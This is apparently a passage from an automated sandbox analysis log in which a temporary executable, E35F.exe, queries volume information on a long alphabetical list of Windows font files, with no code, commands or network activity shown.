                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
